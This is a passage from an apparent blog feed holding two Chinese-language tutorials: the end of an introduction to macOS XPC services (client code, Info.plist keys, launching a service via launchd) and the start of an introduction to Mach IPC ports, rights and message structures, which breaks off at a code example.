class="line">[...]</span><br><span class="line"></span><br><span class="line">// All connections start suspended. You must resume them before they will start processing received messages or sending messages through the remoteObjectProxy. Note: Calling resume does not immediately launch the XPC service. The service will be started on demand when the first message is sent. 
However, if the name specified when creating the connection is determined to be invalid, your invalidation handler will be called immediately (and asynchronously) after calling resume.</span><br><span class="line">- (void)resume;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>In other words, this method tells <strong>each new connection</strong> <strong>how its incoming calls are handled</strong>:</p><ul><li><code>exportedInterface</code>: describes <strong>the methods that are made available to the other end of the connection</strong>.</li><li><code>exportedObject</code>: holds a local object that <strong>handles method calls coming from the other end of the connection</strong>.</li></ul><p>When the application calls a method on the proxy object of its NSXPCConnection, the call is forwarded to the service, where the NSXPCConnection invokes the matching method on the object stored in exportedObject. This is how the remote procedure call is carried out.</p><h4 id="e-Info-plist">e. Info.plist</h4><p><code>Info.plist</code> plays an important role in an XPC Service. An XPC Service must specify some special <strong>key-value pairs</strong> in its Info.plist; some of them are:</p><ul><li><p><strong>CFBundleIdentifier</strong>: the <strong>service name string</strong> of the XPC Service, in reverse-DNS style. Applications use this bundle ID to reach the XPC service.</p><blockquote><p>Remember the Bundle ID you entered when creating the XPC service project? :)</p></blockquote></li><li><p><strong>CFBundlePackageType</strong>: a string giving the bundle package type; for an XPC Service it must be <code>XPC!</code></p></li><li><p><strong>XPCService</strong>: a dictionary</p><ul><li><code>EnvironmentVariables</code>: a dictionary of environment variables for the XPC service at run time.</li><li><code>JoinExistingSession</code>: a Boolean indicating whether the XPC service runs in the <strong>same security session</strong> as its caller.</li><li><code>RunLoopType</code>: a string selecting the service's run loop type; the default is <code>dispatch_main</code>, and the other option is <code>NSRunLoop</code>.</li></ul></li></ul><h3 id="3-Client-简单示例">3. 
Client 简单示例</h3><p>现在我们已经可以让 XPC Service 跑起来了，现在需要编写一个程序来使用 XPC Service。XPC Service 默认模板中提供了如下的 client 代码，它将发送一串字符给 XPC service 并将返回的结果输出：</p><ul><li><p>创建 XPC 连接：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">NSXPCConnection *_connectionToService = [[NSXPCConnection alloc] initWithServiceName:@&quot;io.kiprey.github.XPCDemo&quot;];</span><br><span class="line">_connectionToService.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCDemoProtocol)];</span><br><span class="line">[_connectionToService resume];</span><br></pre></td></tr></table></figure></li><li><p>发送请求</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[[_connectionToService remoteObjectProxy] upperCaseString:@&quot;hello&quot; withReply:^(NSString *aString) &#123;</span><br><span class="line">    // We have received a response. 
Update our text field, but do it on the main thread.</span><br><span class="line">    NSLog(@&quot;Result string was: %@&quot;, aString);</span><br><span class="line">&#125;];</span><br></pre></td></tr></table></figure></li><li><p>在<strong>不需要连接时</strong>再来断开连接</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[_connectionToService invalidate];</span><br></pre></td></tr></table></figure></li></ul><p>正如代码所示，</p><ol><li><p>Client 会使用 XPC Service 中的 Bundle ID 来查找并与 XPC Service 建立连接。</p></li><li><p>之后 Client 指定了 <code>remoteObjectInterface</code> 属性，以规范调用接口的类型。</p></li><li><p>接下来，恢复 XPC 连接，并通过 <code>NSXPCConnection</code> 对象中的 <code>remoteObjectProxy</code> 属性，<strong>间接且透明</strong>的调用 XPC Service 上的接口。当XPC Service 完成服务后，返回的信息会被异步输出至控制台。</p></li><li><p>最后，关闭 XPC 连接。</p></li></ol><h3 id="4-启动-XPC-Service-Client">4. 启动 XPC Service &amp; Client</h3><p>需要特别说明一下如何使用 XPC Service，并让 Client 成功连接上（这个绕了我半天）。</p><h4 id="a-局部-XPC-Service">a. 
局部 XPC Service</h4><blockquote><p>即，将 XPC Service 内嵌进 App 中。</p></blockquote><p>首先，建立一个 App：</p><blockquote><p>坑点：<strong>不能是 Command Line Tool</strong> 。</p><p>因为 Command Line Tool 不具有类似 App 的结构，因此无法托管 XPC Service。</p></blockquote><p><img src="/2022/01/mach_xpc_intro/image-20220104171022403.png" alt="image-20220104171022403"></p><p>之后，在接下来这个界面中<strong>选一个 Language 为 Objective-C</strong> 的 Interface，Interface 是 GUI 相关的暂时不用管：</p><p><img src="/2022/01/mach_xpc_intro/image-20220104171411076.png" alt="image-20220104171411076"></p><p>项目创建后，选择 <code>File -&gt; New -&gt; Target</code>，新建一个 <code>XPC Service</code>。注意到在新建的最后一步中会有一个 <code>Embed in Application</code>选项：</p><p><img src="/2022/01/mach_xpc_intro/image-20220104171917464.png" alt="image-20220104171917464"></p><p>这样，这个新建的 XPC Service 就会被内置进这个 Application 中：</p><p><img src="/2022/01/mach_xpc_intro/image-20220104172028284.png" alt="image-20220104172028284"></p><p>之后，为了简单，我们直接将 <code>main.m</code> 中的原始代码：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#import &lt;Cocoa/Cocoa.h&gt;</span><br><span class="line"></span><br><span class="line">int main(int argc, const char * argv[]) &#123;</span><br><span class="line">    </span><br><span class="line">    @autoreleasepool &#123;</span><br><span class="line">        // Setup code that might create autoreleased objects goes here.</span><br><span class="line">    &#125;</span><br><span class="line">    return NSApplicationMain(argc, argv);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>替换成如下调用 XPC 服务的代码，简单粗暴：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">#import &quot;XPCServiceProtocol.h&quot;</span><br><span class="line"></span><br><span class="line">int main(int argc, const char * argv[]) &#123;</span><br><span class="line">    // Try connect to XPC Service</span><br><span class="line">    NSXPCConnection* _connectionToService = [[NSXPCConnection alloc] initWithServiceName:@&quot;io.github.kiprey.XPCService&quot;];</span><br><span class="line">    _connectionToService.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCServiceProtocol)];</span><br><span class="line">    [_connectionToService resume];</span><br><span class="line">    </span><br><span class="line">    // Try using XPC Service interface</span><br><span class="line">    [[_connectionToService remoteObjectProxy] upperCaseString:@&quot;hello&quot; withReply:^(NSString *aString) &#123;</span><br><span class="line">        // We have received a response. 
Update our text field, but do it on the main thread.</span><br><span class="line">        NSLog(@&quot;Result string was: %@&quot;, aString);</span><br><span class="line">    &#125;];</span><br><span class="line">    </span><br><span class="line">    // Wait for XPC Service response</span><br><span class="line">    NSLog(@&quot;Sleep 5s...&quot;);</span><br><span class="line">    sleep(5);</span><br><span class="line">    </span><br><span class="line">    [_connectionToService invalidate];</span><br><span class="line">    </span><br><span class="line">    NSLog(@&quot;Bye.&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>需要注意的是：当调用者向 XPC Service 请求服务后，由于<strong>请求是异步执行</strong>的，因此执行到程序末尾后<strong>可能调用者还没有接收到 XPC Service 的返回结果</strong>，此时<strong>调用者需要等待</strong>，<strong>千万不能</strong>立即调用 <code>invalidate</code> 方法。</p><blockquote><p>调用 <code>invalidate</code> 方法将会立即终止连接，不会等到 XPC Service 返回信息后再终止连接。</p></blockquote><p>之后<strong>先编译 XPCService</strong>，再编译 Client。以下是执行结果：</p><p><img src="/2022/01/mach_xpc_intro/image-20220104180112370.png" alt="image-20220104180112370"></p><h4 id="b-全局-XPC-Service">b. 
全局 XPC Service</h4><p>上面那种方法简单说明了如何将 XPC Service 内嵌进 App 中并使用，启动和管理也较为方便。</p><p>但要是希望生成的 XPC Service 可以被任意程序调用，那该如何启动？</p><p>首先，编写一个 <code>XPCDemo.plist</code>，这种编写的 plist 称之为 <strong>launchd.plist</strong>。内容如下：</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">plist</span> <span class="keyword">PUBLIC</span> <span class="string">&quot;-//Apple//DTD PLIST 1.0//EN&quot;</span> <span class="string">&quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">plist</span> <span class="attr">version</span>=<span class="string">&quot;1.0&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dict</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>Label<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">string</span>&gt;</span>io.kiprey.github.XPCDemo<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span 
class="name">key</span>&gt;</span>Program<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">string</span>&gt;</span>/Users/kiprey/Desktop/Mach_test/XPCDemo/Build/Products/Debug/XPCDemo.xpc/Contents/MacOS/XPCDemo<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>KeepAlive<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">true</span>/&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>POSIXSpawnType<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">string</span>&gt;</span>Interactive<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>MachServices<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">dict</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">plist</span>&gt;</span></span><br></pre></td></tr></table></figure><p>It specifies:</p><ol><li><code>Label</code>: <strong>the unique label that identifies this XPC Service job to launchd</strong></li><li><code>Program</code>: the path of the daemon to launch</li><li><code>KeepAlive</code>: whether launchd should keep the daemon running and restart it after a crash</li><li>…</li></ol><blockquote><p>More details about launchd.plist can be found in <code>man launchd.plist</code>, so they are not repeated here.</p></blockquote><p>After that, we can <strong>let launchd start and manage our XPC Service</strong>.</p><p>My original plan was to copy <code>XPCDemo.plist</code> into <code>/System/Library/LaunchDaemons</code>, but the cp command failed with <code>Read-only file system</code>, meaning the target folder cannot be written to. Neither disabling SIP nor running <code>sudo mount -uw /</code> to remount the root path as writable made the folder writable. I did not want to fight with other approaches, so I gave up on copying the plist into the System Launch Daemons folder.</p><blockquote><p>This error is probably because the target folder is under <code>/System</code>.</p><p>We can still copy the plist into <code>/Library/LaunchDaemons</code>, though.</p></blockquote><p>Even without copying the plist into a Launch Daemons folder, we can still have launchd start our XPC Service:</p><ul><li><p>First, run <code>chown</code> to change the ownership of the newly created <code>XPCDemo.plist</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:wheel XPCDemo.plist</span><br></pre></td></tr></table></figure></li><li><p>Then run the following command so that launchd starts the target program</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo launchctl bootstrap system XPCDemo.plist</span><br></pre></td></tr></table></figure></li><li><p>When we want launchd to stop the target XPC Service, run the following command</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo launchctl bootout system XPCDemo.plist</span><br></pre></td></tr></table></figure></li></ul><p>Once launchd manages our global XPC Service, if the service crashes, launchd restarts it every 10 seconds:</p><blockquote><p>The screenshot is from an earlier test in which XPCDemo died right after starting, so launchd kept restarting it every 10 seconds, indefinitely.</p><p>Command for viewing the log: <code>log show --predicate 'processID == 0' --last 1h | grep &quot;XPC&quot;</code></p></blockquote><p><img src="/2022/01/mach_xpc_intro/image-20220104202227521.png" alt="image-20220104202227521"></p><p>Note that the binary built from a standalone Xcode XPC Service project cannot be executed directly, so it cannot run under launchd as is. Following <a href="https://developer.apple.com/documentation/xcode/signing-a-daemon-with-a-restricted-entitlement">Signing a Daemon with a Restricted Entitlement</a>, the XPC Service has to be built in an <strong>app-like form</strong> that yields a runnable executable.</p><h3 id="5-NSXPC-架构">5. 
NSXPC Architecture</h3><p>The diagram below shows that the <code>[ServiceDelegate listener]</code> method above simply sets up the <code>Exported Object</code> on the NSXPC Service side.</p><p><img src="/2022/01/mach_xpc_intro/NSXPC_intro_2x.png" alt="img"></p><p>And this diagram illustrates the whole XPC communication process:</p><p><img src="/2022/01/mach_xpc_intro/NSXPC_connection_2x.png" alt="img"></p><h2 id="三、C-Stype-XPC-Service">III. C-Style XPC Service</h2><p>Once the Objective-C XPC Service is understood, the C-style XPC Service becomes easier to follow.</p><p>I will not go into the details here; these are two references on C-style XPC:</p><ul><li><a href="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW28">Using the C XPC Services API - Apple Documentation Archive</a></li><li><code>man xpc</code></li></ul><h2 id="四、参考">IV. References</h2><ul><li><a href="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1">Creating XPC Services - Apple Documentation Archive</a></li><li><a href="https://www.runoob.com/ios/ios-objective-c.html">Introduction to Objective-C - 菜鸟教程 (Runoob)</a></li><li><a href="https://en.wikipedia.org/wiki/Blocks_(C_language_extension)">Blocks (C language extension) - Wikipedia</a></li><li><a href="https://objccn.io/issue-14-4/">XPC - ObjC 中国</a></li><li><a href="https://developer.apple.com/forums/thread/656817">How to use XPC in command line app - Apple Developer Forums</a></li><li><a href="https://developer.apple.com/documentation/xcode/signing-a-daemon-with-a-restricted-entitlement">Signing a Daemon with a Restricted Entitlement - Apple Developer Documentation</a></li><li><a href="https://support.apple.com/zh-cn/guide/terminal/apdc6c1077b-5d5d-4d35-9c19-60f2397b2369/mac">Script management with launchd in Terminal on Mac - Apple Support</a></li><li>macOS manual pages</li><li><a href="http://technologeeks.com/docs/launchd.pdf">Launchd.pdf - Jonathan Levin</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
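&lt;p&gt;XPC is an OS X &lt;strong&gt;inter-process communication technology&lt;/strong&gt; that complements the &lt;strong&gt;App Sandbox&lt;/strong&gt; with &lt;strong&gt;privilege separation&lt;/strong&gt;. &lt;strong&gt;Privilege separation&lt;/strong&gt; means &lt;strong&gt;splitting an application into several parts&lt;/strong&gt; according to the system resources each part needs, with each part &lt;strong&gt;using only the entitlements it declares in advance (its sandbox)&lt;/strong&gt;. Each such component is called an &lt;strong&gt;XPC service&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Splitting an application into several parts also improves reliability: a crash in one part of the code does not bring down the whole program.&lt;/p&gt;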
&lt;/li&gt;
&lt;li&gt;
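&lt;p&gt;Each XPC service lives in its own sandbox; that is, it has &lt;strong&gt;its own container&lt;/strong&gt; and &lt;strong&gt;its own set of entitlements&lt;/strong&gt;. An XPC service bundled inside an application can be accessed only by that application. When the application launches, the system automatically registers every XPC service it finds into a namespace visible to the application, after which the application can communicate with the XPC service and send it requests.&lt;/p&gt;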
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Key properties of XPC services: &lt;strong&gt;privilege separation&lt;/strong&gt; + &lt;strong&gt;fault isolation&lt;/strong&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;XPC services are managed by launchd; when an XPC service terminates unexpectedly (or crashes), launchd restarts it.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    
    <category term="mac" scheme="https://kiprey.github.io/tags/mac/"/>
    
    <category term="ipc" scheme="https://kiprey.github.io/tags/ipc/"/>
    
    <category term="xpc" scheme="https://kiprey.github.io/tags/xpc/"/>
    
  </entry>
  
  <entry>
    <title>An Introduction to Mach IPC on Mac OS X</title>
    <link href="https://kiprey.github.io/2021/12/mach_ipc_intro/"/>
    <id>https://kiprey.github.io/2021/12/mach_ipc_intro/</id>
    <published>2021-12-23T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.034Z</updated>
    
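    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>Mach is a <strong>communication-oriented</strong> operating system <strong>microkernel</strong> whose basic unit of work is the <code>task</code> (rather than the process). The Mach kernel provides an IPC mechanism, and most XNU services are built on top of Mach IPC and Mach tasks.</p><p>Mach has several fundamental abstractions, among them <code>task</code>, <code>thread</code>, <code>port</code>, <code>message</code>, and <code>memory object</code>.</p><p>As a component of the macOS XNU kernel, the Mach microkernel is responsible for a considerable share of its functionality. The best known part is the Mach IPC inter-process communication mechanism.</p><p>In this post I briefly record some of how Mach IPC works.</p><blockquote><p>Please note that this is my first encounter with Mach IPC, so some statements or explanations here may be wrong. Corrections from readers are very welcome.</p></blockquote><span id="more"></span><h2 id="二、Mach-Task-Thread">II. Mach Task &amp; Thread</h2><p>Mach splits the traditional UNIX <strong>process</strong> abstraction into <code>task</code> and <code>thread</code>:</p><ul><li><p>A task is an <strong>execution environment and a static entity</strong>. It does not perform computation itself; instead it provides a framework in which other entities (such as threads) execute. BSD processes in the kernel (similar to Unix processes) correspond one-to-one with Mach tasks.</p><p>A task is also the <strong>basic unit of resource allocation</strong>. The resources associated with a BSD process are contained in its task.</p><p>Each task also represents a <strong>protection boundary</strong>. A task cannot access the resources of another task until it has obtained access to them.</p></li><li><p>A thread is the entity that actually executes in Mach, and it is the point of control flow within a task. It runs in the context of its task.</p><p>The code a thread executes resides in the address space of its task. Each task contains zero or more threads.</p></li></ul><p>From the description above, a task can loosely be understood as a process in the traditional sense (quite similar, isn't it? :))</p><blockquote><p>Note that once a task has been created, <strong>anyone holding the task identifier can modify the task</strong>.</p></blockquote><h2 id="三、Mach-Port">III. Mach Port</h2><h3 id="1-概念">1. 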
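Concept</h3><p>A Mach port is a kernel-protected, <strong>unidirectional</strong> IPC channel, a capability, and a name. Inside the Mach <strong>kernel</strong>, a Mach port is implemented as a <strong>bounded</strong>, <strong>kernel-maintained</strong> <strong>message queue</strong>. Somewhat like a Linux pipe, operations on it block when the queue is full or empty, and its basic operations are sending and receiving messages. The queue is a <strong>multi-producer, single-consumer</strong> queue: there can be only one receive right.</p><p>The port abstraction and its associated operations are the foundation of Mach communication. Each port has kernel-managed rights associated with it, and a task must hold the appropriate right to a port before it can operate on that port. When a Mach message is sent to a port, only the task holding the <strong>receive right</strong> for that port can receive the message and remove it from the queue.</p><blockquote><p>For example, such rights can allow some tasks to send messages to a given port, or designate which task may receive the messages sent to it.</p></blockquote><p>Mach ports are <strong>very important</strong> in Mach: a port is a <strong>reference to an object</strong> and stands for the services, resources, and other abstractions of the OS. Inside the Mach kernel, a great many data structures and services are represented by Mach ports, and user space can reach tasks, threads, and memory objects through the corresponding ports.</p><p>The name of a Mach port is an integer but, unlike file descriptors, Mach ports are not implicitly inherited across fork.</p><h3 id="2-Port-Right">2. Port Right</h3><p>Every Mach port is accessed through <strong>rights</strong> to that port. The following are some of the port right types defined by Mac OS X:</p><ul><li><code>MACH_PORT_RIGHT_SEND</code>: the holder may send messages to the port.</li><li><code>MACH_PORT_RIGHT_RECEIVE</code>: the holder may receive messages from the port.</li><li><code>MACH_PORT_RIGHT_SEND_ONCE</code>: the sender may send only one message. Whether or not the right is destroyed, this handle always results in exactly one message being sent.</li><li><code>MACH_PORT_RIGHT_PORT_SET</code>: a collection of port names, which can be viewed as a set of receive rights for multiple ports. A port set can be used to listen on several ports at once, similar to mechanisms such as epoll.</li><li><code>MACH_PORT_RIGHT_DEAD_NAME</code>: merely a placeholder. Once a port is destroyed, <strong>all existing rights held through handles to that port</strong> turn into dead names (that is, invalid rights). The dead name mechanism prevents the <strong>port name</strong> from being reused too early.</li></ul><p>When the <strong>receive right</strong> of a port is released, the port is considered <strong>destroyed</strong>. Note that the receive right can be held by only one task at any time.</p><p>A <strong>port right name</strong> is the specific integer value a task uses to <strong>refer to a port right it holds</strong>, somewhat like a file descriptor. Note that a port right name is meaningful only in the context of the task that owns it: even if the name is sent to another task, that task cannot use it to access the corresponding Mach port (again, just like a file descriptor).</p><blockquote><p>This port right name is the <code>mach_port_t</code> value we most often see in <strong>user space (it must be stressed that this applies to user space)</strong>.</p><p>Note that there is also the port name (distinct from the port right name), which in user space is a value of type mach_port_name_t.</p></blockquote><p><strong>The relationship between a port name and a right</strong> resembles the relationship between a <strong>file descriptor</strong> and the <strong>permissions</strong> of that file descriptor in Unix. However, <strong>do not simply equate a right with a permission</strong>: a Mach port right still differs considerably from the word <strong>permission</strong>.</p><h2 id="四、Mach-Message">IV. Mach Message</h2><p>A Mach IPC message is the data object that threads use to communicate with one another, and it is the typical way for tasks to communicate. A message may contain the actual data (inline data) or a pointer to out-of-line (OOL) data; the latter is an optimization for transferring large amounts of data.</p><p>A Mach message consists of the following parts:</p><ul><li><p>A <strong>mandatory</strong> message header (of type mach_msg_header_t)</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span>   <span class="keyword">struct</span> </span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">mach_msg_bits_t</span>     msgh_bits;           <span class="comment">// message flag bits</span></span><br><span class="line">  <span class="type">mach_msg_size_t</span>     msgh_size;           <span class="comment">// total size of the message: header + body + data</span></span><br><span class="line">  <span class="type">mach_port_t</span>         msgh_remote_port;    <span class="comment">// destination port right</span></span><br><span class="line">  <span class="type">mach_port_t</span>         msgh_local_port;     <span class="comment">// auxiliary port right</span></span><br><span class="line">  <span class="type">mach_port_name_t</span>    msgh_voucher_port;</span><br><span class="line">  <span class="type">mach_msg_id_t</span>       msgh_id;            <span class="comment">// not used while the message is delivered; the user is free to set it</span></span><br><span class="line">&#125; <span class="type">mach_msg_header_t</span>;</span><br></pre></td></tr></table></figure></li><li><p>An optional message body (of type mach_msg_body_t)</p><figure class="highlight cpp"><table><tr><td 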
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">        <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">&#125; <span class="type">mach_msg_body_t</span>;</span><br></pre></td></tr></table></figure><blockquote><p>Note that the message body is <strong>more than</strong> this one simple structure; see the figures below.</p></blockquote></li><li><p>The user data to be sent</p></li><li><p>An optional trailer (of type mach_msg_trailer_t). This field only matters on the receiving side, where the kernel appends it to the received message. It is covered later.</p></li></ul><p>An example of a simple message, where header.size is the total size of header + data:</p><p><img src="/2021/12/mach_ipc_intro/5e0d813f5ca94df8896453137156d751.png" alt="Mach消息发送机制_第1张图片"></p><p>An example of a complex message. Unlike a simple message, a complex message also carries a body that describes additional information.</p><p><img src="/2021/12/mach_ipc_intro/bbb233c138ce4e8595162d43dcb90e5a.png" alt="Mach消息发送机制_第2张图片"></p><p>A more detailed diagram:</p><p><img src="/2021/12/mach_ipc_intro/image-20211230113611950.png" alt="image-20211230113611950"></p><p>Here is a concrete code sample of a complex message. The <strong>body consists of the <code>msgBody</code> field and the <code>ports[1]</code> field</strong>, and the data to be sent is the <code>notifyHeader</code> field:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">PingMsg</span> &#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span>           msgHdr;</span><br><span class="line">    <span class="type">mach_msg_body_t</span>             msgBody;</span><br><span class="line">    <span class="type">mach_msg_port_descriptor_t</span>  ports[<span 
class="number">1</span>];</span><br><span class="line">    OSNotificationHeader64      notifyHeader __attribute__ ((packed));</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>How messages are used and how they work is explained step by step in the usage sections that follow.</p><h2 id="五、Mach-API-入门使用">V. Getting Started with the Mach API</h2><h3 id="1-单向-Mach-通信示例">1. One-way Mach communication example</h3><h4 id="代码示例">*. Code example</h4><p>The following is a simple example of IPC using the low-level Mach API.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span 
class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> 
